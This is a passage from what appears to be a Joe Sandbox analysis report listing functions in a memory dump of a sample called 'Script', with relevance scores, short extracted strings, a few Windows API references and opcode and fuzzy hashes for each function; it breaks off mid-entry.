Opcode Fuzzy Hash: 9a12cccfc4dcb871410783322cdb203cc87cb0e53b507c0f96e0fe996f547084
Instruction Fuzzy Hash: 5681A1B15087808BD7149B3985913AFBBD2AFD5324F148A2FE4E9C33D2DA7985858B07

Function 0040F430 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

r, xrefs: 0040F450
I, xrefs: 0040F583

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: I$r
API String ID: 0-3488194283
Opcode ID: af75585ce3192d8d242df0c2d3cdfd0b33462f513dea96953d081da246ccc2ba
Instruction ID: f3f0feaf77f0b752ccf06e1f1812d169b41a8e7c15216984edafa2ba736f22e2
Opcode Fuzzy Hash: af75585ce3192d8d242df0c2d3cdfd0b33462f513dea96953d081da246ccc2ba
Instruction Fuzzy Hash: 8D51C1B650C7808AD7209B3888453EBBBD5AB96324F284A7ED8D9C73C2D63D8445871B

Function 0041ACF9 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

{:;8, xrefs: 0041B14C

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: {:;8
API String ID: 0-2687946593
Opcode ID: ac57bb4bbc7b0d6600352fadbb3ce6177d809d8bd4ca3efd9c8cbd54be818141
Instruction ID: 823f9a503f0d07f327a38e96fc2b645309952715eba7c3724c539ad6ad3799a6
Opcode Fuzzy Hash: ac57bb4bbc7b0d6600352fadbb3ce6177d809d8bd4ca3efd9c8cbd54be818141
Instruction Fuzzy Hash: 16F1DEB49007018FD7209F28C592663BBF1FF56310F188A9DD8D68B795E338E45ACB96

Function 0042E3E0 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

", xrefs: 0042E6C8

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: c13b75116c21ef930a25c94b2c51a5f01decd53532f5debd64e0c0e65612cec9
Instruction ID: e1a0f1bbcf59c9b8d8dc8c62f3d82e17b9de76f9db02a6ae348f9a7d28605f51
Opcode Fuzzy Hash: c13b75116c21ef930a25c94b2c51a5f01decd53532f5debd64e0c0e65612cec9
Instruction Fuzzy Hash: F2C15872B083205FD724DE26E45076BB7D5AF94314F98892FE89587382EB3CEC458786

Function 0043608B Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004360D0

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 5b7f23269c7ffffbf8a1f86d3cb1c2f58d5172f3e3eb70496817cd7fd2e0e7dc
Instruction ID: 9e311828a4b799fd0f4cf61e38fab554267387829e265b5614e94e8d07a1587b
Opcode Fuzzy Hash: 5b7f23269c7ffffbf8a1f86d3cb1c2f58d5172f3e3eb70496817cd7fd2e0e7dc
Instruction Fuzzy Hash: 9E514D71608B828ED329CF3C8855756FFD26B56224F0987ADE0FACB3D2D624D541C792

Function 0043CAD0 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043CD00

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 8c8d761a2e8116687cb9298de56f8cca4c09d9809388432983d5655b3f7772b6
Instruction ID: e26113320899ad3ce79dceac4b79907efd74e90f7a1476ea1fa8b54e1d92be7f
Opcode Fuzzy Hash: 8c8d761a2e8116687cb9298de56f8cca4c09d9809388432983d5655b3f7772b6
Instruction Fuzzy Hash: BFA15A716043009BD324CF25D8C172BBBA2EBC9314F28A62EF56927295D738EC05CBC9

Function 00425DE0 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00425ED4

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 2a6a9fcf3773646383a55e6287354a667b46520632b9b6a1aa77d8f0315e3b03
Instruction ID: 8e2b06cec963ec1f08ad16d59c5077e9359a57790211fef4dadfc01138d696ac
Opcode Fuzzy Hash: 2a6a9fcf3773646383a55e6287354a667b46520632b9b6a1aa77d8f0315e3b03
Instruction Fuzzy Hash: EE3168B2A083609BD704CF24C81075FBBD3EFC6708F49C82DE5855B284CA71990AC786

Function 00427E78 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

, xrefs: 00428098

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 7973b4c1f1e50ac0683abeaa0578d39e638ced97aaf04a4f08e1395a0d910024
Instruction ID: 58de75a1625a050c64edb28a11e750435709f112f9e21f0322b31b8e00207c39
Opcode Fuzzy Hash: 7973b4c1f1e50ac0683abeaa0578d39e638ced97aaf04a4f08e1395a0d910024
Instruction Fuzzy Hash: 4CB18A71B09362CFD724CF24D8512BBBBA0EF16310F8946AEC4865B3C2D7388985D799

Function 00434771 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

$"', xrefs: 00434BB9

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $"'
API String ID: 0-223639113
Opcode ID: 36bc7564e6b5760be58e83cde9167119786113cc048a5728ed56d893c9c7eb50
Instruction ID: 7d5bc9430f9ec07f8bf9632c61b91ef671a31b53697698ab4203f6f58e101c4c
Opcode Fuzzy Hash: 36bc7564e6b5760be58e83cde9167119786113cc048a5728ed56d893c9c7eb50
Instruction Fuzzy Hash: FFD13771608B808FD3268A38C8913E7BFE25FDA318F0C897DC4DB87782D679A5058716

Function 0041DED0 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

$, xrefs: 0041E062

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 353886600ded48c6ded09e920ad39fa90f3aa7869d9c01e7fd72830cfd9466ba
Instruction ID: 8a4feef17c83b9f120c8fa8fb5c7421ec6a1c002e92e362606c1cb49c98adca9
Opcode Fuzzy Hash: 353886600ded48c6ded09e920ad39fa90f3aa7869d9c01e7fd72830cfd9466ba
Instruction Fuzzy Hash: 15912637B49A904BD728893D4C613AAB9834BD7230F2DC37EE9B6C73E5D9A948424345

Function 00406180 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 004062B6

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction ID: db16fa7d19cb76792cb26cf9364906bb746c1888f3262d0907fc74c62c58ee5a
Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction Fuzzy Hash: CDB149701083819FC325DF58C98061BFBE0AFA9704F444A6DE5DA9B782D635E918CB67

Function 0043FF10 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

-, xrefs: 0043FFC1

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: f568d085c531bd825eba7a72b380388fb69437574a8b38ae6c83993c295cd071
Instruction ID: ca8f39d2c080fd503120bedcd4895aaeebda0b45c525ce160020c7db08f0a279
Opcode Fuzzy Hash: f568d085c531bd825eba7a72b380388fb69437574a8b38ae6c83993c295cd071
Instruction Fuzzy Hash: 4991D37160C3518FD315CF29C89066FBBE1ABCA314F18867EE5D48B352D639D846CB86

Function 00434ED0 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

$, xrefs: 00435012

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 0e4137276b267969250297fb2d539d81e6984b35f8d2a4ab02811ccb3bab363a
Instruction ID: 79a8da6f620016948757346cebf310a5e91be9ac9fbe23793a9ad56c52aff44c
Opcode Fuzzy Hash: 0e4137276b267969250297fb2d539d81e6984b35f8d2a4ab02811ccb3bab363a
Instruction Fuzzy Hash: 84715B26A09EE14BC7145A3C4C503BABE534BDB330F2E936EE9F1473D2C6598D029399

Function 0042F59A Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

/"-q, xrefs: 0042F76F

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: /"-q
API String ID: 0-3858033087
Opcode ID: f649d6a1a16ea5972c1d92e2ab87512fb6882748b5ce1d8f48747577bf3712cb
Instruction ID: 8ff59a6bdbe4e951ff184fb434c6c383c2a83aee4eb039aa961f4f5335650269
Opcode Fuzzy Hash: f649d6a1a16ea5972c1d92e2ab87512fb6882748b5ce1d8f48747577bf3712cb
Instruction Fuzzy Hash: DB51AF702087D18BD7398F29D8653EBBBE1AFD7304F58896DD0D98B392C63980098B56

Function 0042F973 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

\b(., xrefs: 0042F995

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: \b(.
API String ID: 0-1783092013
Opcode ID: dcbfe09f1ee734997de056be3645b8aadee8f4823521c6ffc5cb87330fd810e6
Instruction ID: 6a1781c3198b477c4a279b155d845c2a474f6e37f6b0f61d8e7c88168a75bd67
Opcode Fuzzy Hash: dcbfe09f1ee734997de056be3645b8aadee8f4823521c6ffc5cb87330fd810e6
Instruction Fuzzy Hash: 6751247560D3918BD7248B3598693ABBBE2AFD6300F58C57EC0CD9B3A1DB7844058B86

Function 0043C880 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043C8E0

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 8f129d1a08b7cb77342c3ffc5e1922aa73a6518bf98a1d954b347943d32a8f62
Instruction ID: 9665e6fb5f06253a36dc210ec0fdd6ab37c49c5a1a13ebf8d81cf6d907c7b576
Opcode Fuzzy Hash: 8f129d1a08b7cb77342c3ffc5e1922aa73a6518bf98a1d954b347943d32a8f62
Instruction Fuzzy Hash: 33513AB9604201DFE304EF29EC81B3A73A6FF89314F06953DF185562A0D778A815CB8A

Function 0042F55A Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

/"-q, xrefs: 0042F76F

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: /"-q
API String ID: 0-3858033087
Opcode ID: fc6444d9eebb3ab56509e6d5cbe1b144042aec5faed9d61d818371c5a18affba
Instruction ID: 44f2acb715c5e3878a5b273adc9682961baef8541c69e8b922b77ed56cb0d455
Opcode Fuzzy Hash: fc6444d9eebb3ab56509e6d5cbe1b144042aec5faed9d61d818371c5a18affba
Instruction Fuzzy Hash: D651A2742187D18BD739CF29D8653EBBBE1ABD6304F58886DD0D98B392C7398009CB56

Function 0043CEC0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

aYX[, xrefs: 0043CF10

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID: aYX[
API String ID: 2994545307-1332217189
Opcode ID: 0073d6eb2e0bdd54b19be40e340d25cd3b6bc52397cbd6199a99c3d652d2f6c5
Instruction ID: 4c5cba659bcc676617274f58d6f7b8c997201cdbbfc165792b1d98e067eeee00
Opcode Fuzzy Hash: 0073d6eb2e0bdd54b19be40e340d25cd3b6bc52397cbd6199a99c3d652d2f6c5
Instruction Fuzzy Hash: C7418CB5A09300ABE3189F24ED41B2B77A5EF89B4CF14543EF98093281E735ED0587DA

Function 004195CF Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

h, xrefs: 00419608

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: f73d669e4214e7f5c8a331b0628accba86e398d726fbf6069ad660c7bf542ed0
Instruction ID: 949031bbe98d7b827a5d4b6c1176051a3a0985db952c49312ca9212a26b2d73b
Opcode Fuzzy Hash: f73d669e4214e7f5c8a331b0628accba86e398d726fbf6069ad660c7bf542ed0
Instruction Fuzzy Hash: AD51C0705083818AC7359F28C465BAFB7E2EFD2314F148D2DD09AAB391EB784844C79A

Function 00418BF1 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

h, xrefs: 00419608

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 7c1932e4b76717a80fb3fc985c40df8e38351741c772d98f5e5ec48c2de45670
Instruction ID: 6ef327cd86944e03c866e3b8b2d8bdb9702fc31069378d3778475ac82571314c
Opcode Fuzzy Hash: 7c1932e4b76717a80fb3fc985c40df8e38351741c772d98f5e5ec48c2de45670
Instruction Fuzzy Hash: FA419E705083818AD7359F28C465BABB7E2EFD2314F148D1DD0DA9B391EB788845CB9A

Function 004069B0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2db82a6d22929aa14d807eea27360cbaf861a149118a89360bf4c708cc653d
Instruction ID: 5859c77440dfb4812297d60e01c0be2fe3472acbf65a6697f0e3486349134b2a
Opcode Fuzzy Hash: bf2db82a6d22929aa14d807eea27360cbaf861a149118a89360bf4c708cc653d
Instruction Fuzzy Hash: AC52DFB0A08B848FEB348B24C0843A7BBE1AB91314F15487FD5E7567C2D27DB995C74A

Function 00402F50 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205bd127e30bf2d6e6e7bee8ccaa8ee9f46214a6e5b1d44f3dfeccd49a692c0a
Instruction ID: ae3dbf4e51ca74f2c84e816ab13c38f8233d05f38ebe253589d8df495da73eac
Opcode Fuzzy Hash: 205bd127e30bf2d6e6e7bee8ccaa8ee9f46214a6e5b1d44f3dfeccd49a692c0a
Instruction Fuzzy Hash: CA52F3715083459FC714CF18C0806AABFE5BF89305F188A7EF8996B391D778EA49CB85

Function 00407790 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
Instruction ID: 28fe5f500e17a02d2ec653dbdd8ec1b1311a4a64d7befdc43c0c93b91a55967b
Opcode Fuzzy Hash: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
Instruction Fuzzy Hash: 23229232A0C7118BD725DF18D9406ABB3E1BFC4319F19893ED986A7385D738B8518B87

Function 00403950 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b46f206ddc740ffe3e07718a9e36935b13477c3c025b5443b09b4385ad6176c8
Instruction ID: 3e08283f2d85343d4e0b7577a4dad15c6cd686c80bfc13a2904270bed9c0fa4a
Opcode Fuzzy Hash: b46f206ddc740ffe3e07718a9e36935b13477c3c025b5443b09b4385ad6176c8
Instruction Fuzzy Hash: 72322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 00405B60 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd522a324902c276fefc9d88636d312144888e2e343a04f7fceacd7bf559ea5b
Instruction ID: 6cae524d7c21be9bd3a026aa259a3d512b93b9bab41b6381a3325633a0bc6317
Opcode Fuzzy Hash: bd522a324902c276fefc9d88636d312144888e2e343a04f7fceacd7bf559ea5b
Instruction Fuzzy Hash: 9812D8356087409FC718CF29C88176BFBE2EFC9304F18986DE48597391D67AD806CB96

Function 00423060 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f3831ff4eca7432d66e2e1bc0c6706984b41d31d7478b4cef9bace2efd5c9c
Instruction ID: 0b42bd4199188bd718cfb8463afa2333c0c14818ccad032d8ac0b81abeff9b41
Opcode Fuzzy Hash: b4f3831ff4eca7432d66e2e1bc0c6706984b41d31d7478b4cef9bace2efd5c9c
Instruction Fuzzy Hash: 8ED12572A083208BD314DF25D85272BB7F1EF81319F58896DE8C997381E77C9E04879A

Function 0041CDB0 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3d0ec9be8831b1132873cda800ed730d2851555b261efaab1ccb00b9e95f6b
Instruction ID: 520ea0975901646e008c7c1aa3c118165068de9731a7419fc802a57889bb65d7
Opcode Fuzzy Hash: 6f3d0ec9be8831b1132873cda800ed730d2851555b261efaab1ccb00b9e95f6b
Instruction Fuzzy Hash: 7FB102B55483009BD724CF28C8927ABB7F1EF81354F188A1DE8D68B391E339D945C79A

Function 0042078E Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56bbca92c86346c3f6d178a6336577cc4a345dce2d40528d3d7db9de6e8f52ab
Instruction ID: 25d8681cfa18f419f45e0489c49e99ddea93d74d2deead6a68aed1498dd71fc4
Opcode Fuzzy Hash: 56bbca92c86346c3f6d178a6336577cc4a345dce2d40528d3d7db9de6e8f52ab
Instruction Fuzzy Hash: 8D124D21608FC18AD335CA3C8844797BFD25B67234F088BADE1FE8B3D3D66965058726

Function 00439916 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af91735bd7405230b638cc4a456aa7a13d3c13251099d203a5f606bfe0427885
Instruction ID: 8f1361515a522702f6402dac862a04952180f511302af863d3616ccd0c812ba9
Opcode Fuzzy Hash: af91735bd7405230b638cc4a456aa7a13d3c13251099d203a5f606bfe0427885
Instruction Fuzzy Hash: 45123C21508BC1CADB26CE3C888834A7F915B67224F1D83D9D8F54F3EBC7698906C766

Function 0041D6C0 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f6f7051eb7dacdae846a493e71e701df1cca4e3a8179b31a6d6e8c8a722343f
Instruction ID: f7c29bb49aa43dc45e7284d7ba0eadb61a3ea00b2a828f085baf3c8924ab4199
Opcode Fuzzy Hash: 0f6f7051eb7dacdae846a493e71e701df1cca4e3a8179b31a6d6e8c8a722343f
Instruction Fuzzy Hash: 0AC15AB2A082104FC715CE28C89129BB7E1EBD5324F19863DECE997382D739DD46C796

Function 00436869 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f7a9f038f4f89194d88271f3dc5947d84db2d2b75feb6c0307bedebd7ace6b
Instruction ID: a88f8ded956135719c495e579d00c16fb531979563b5401d7890bd7d3be29efd
Opcode Fuzzy Hash: 27f7a9f038f4f89194d88271f3dc5947d84db2d2b75feb6c0307bedebd7ace6b
Instruction Fuzzy Hash: BEE16F70108BC19FD3618B3DC551362FFE0AF16204F58C99ED0EA8BB83D26AE155CB96

Function 00433C64 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1702311ea671b72c78ed1328138e26e7c19b61043aad7c3c89d5ec1ce5459a
Instruction ID: e4c24d152e6f3509325c57194cbd16a0254647ca99e731e30fa3824893fe45c6
Opcode Fuzzy Hash: 2c1702311ea671b72c78ed1328138e26e7c19b61043aad7c3c89d5ec1ce5459a
Instruction Fuzzy Hash: CBD1E771608F804BD3268B38C8553E7BFE25B96328F5C8A7DC5EA873C2D539A506C716

Function 0041DAD0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5d8e8d7cba2114b3f1a5ece4603143562bd8b9a8b0979084a9446aa3b73359
Instruction ID: 3625461d5ea68eeba0886c809ebc736de7efe21e7e8a778b0a87daa2a0dab454
